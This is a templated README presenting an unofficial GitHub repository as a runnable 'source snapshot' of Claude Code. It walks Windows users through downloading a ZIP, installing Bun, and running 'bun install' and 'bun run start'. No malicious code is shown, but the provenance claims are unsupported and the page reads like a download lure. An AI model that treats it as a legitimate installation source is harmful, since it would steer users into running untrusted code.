claude-code is a source snapshot of Claude Code that you can run on Windows with Bun. It is built for end users who want a local app that starts from source without a long setup.
Use this when you want a simple way to get the app from the GitHub page and run it on your PC.
Before you start, check that your PC has:
- Windows 10 or Windows 11
- A stable internet connection
- Enough free disk space for the app and Bun
- Permission to install software on your PC
- A web browser to open the GitHub page
You do not need deep technical knowledge. You only need to follow the steps in order.
Visit this page to download and run the app from source:
https://github.com/regressive-topos551/claude-code
On that page, look for the latest source snapshot or release files, then download the package that matches the Windows setup steps below
claude-code runs with Bun, so you need Bun on your system first.
- Open your browser
- Go to the Bun website
- Download the Windows installer
- Run the installer
- Finish the setup
- Close the installer when it ends
After setup, open Command Prompt and check that Bun works:
bun --version
If you see a version number, Bun is ready
- Open the GitHub page
- Download the source snapshot ZIP
- Save the file to your Downloads folder
- Right-click the ZIP file
- Choose Extract All
- Pick a folder you can find again, such as Desktop or Documents
After extraction, you should see the project files in a new folder named claude-code
Open the extracted claude-code folder.
You may see files such as:
package.jsonsrcREADME.mdbun.lock- app config files
Then open Command Prompt in that folder:
- Open the folder in File Explorer
- Click the address bar
- Type
cmd - Press Enter
This opens Command Prompt in the right folder.
Run this command:
bun install
This step gets the files the app needs to run.
Wait until the command ends. If the window shows no error, the setup is complete.
Start the app with:
bun run start
If that does not work, try:
bun run dev
The app should open in a new window or show a local address in the terminal. If it shows a local address, copy it into your browser.
Once the app is running, you can:
- Open the app in your browser or desktop window
- Enter your input in the chat or command area
- Review the response on screen
- Copy results for later use
- Close the app when you are done
If the app asks for a key, sign-in, or local config, use the fields shown in the app interface
If the app does not start, check these items:
- Bun is installed
- You ran the command in the
claude-codefolder - The source files extracted fully
- Your Windows user account has access to the folder
- No other app is using the same local port
If you moved the folder after setup, open it again and run the start command from the new location
Use these basic commands in the project folder:
bun install- install the app filesbun run start- start the appbun run dev- run the app in development modebun --version- check Bun
A typical project folder may look like this:
src/- app source filespublic/- static filespackage.json- project configREADME.md- project infobun.lock- Bun lock file
If your folder has different names, follow the file names you see in the extracted snapshot
Before you run any file from the repo, make sure:
- The download came from the GitHub page above
- The file names match what you expected
- You did not rename files by mistake
- You run the app from the extracted project folder
Try these steps in order:
- Close the terminal
- Open the project folder again
- Confirm Bun is installed
- Run
bun installagain - Run
bun run startagain - Re-extract the ZIP file if files look broken
If the page does not open, copy the local address shown in the terminal and paste it into your browser
This source snapshot is meant to give you a working local build path for Claude Code with Bun. It is suited for users who want to:
- run the app from source
- keep the setup on Windows
- use a simple local install flow
- test the app from a GitHub snapshot
- Open the GitHub page
- Download the source snapshot
- Install Bun on Windows
- Extract the project folder
- Open Command Prompt in that folder
- Run
bun install - Run
bun run start - Open the local app address in your browser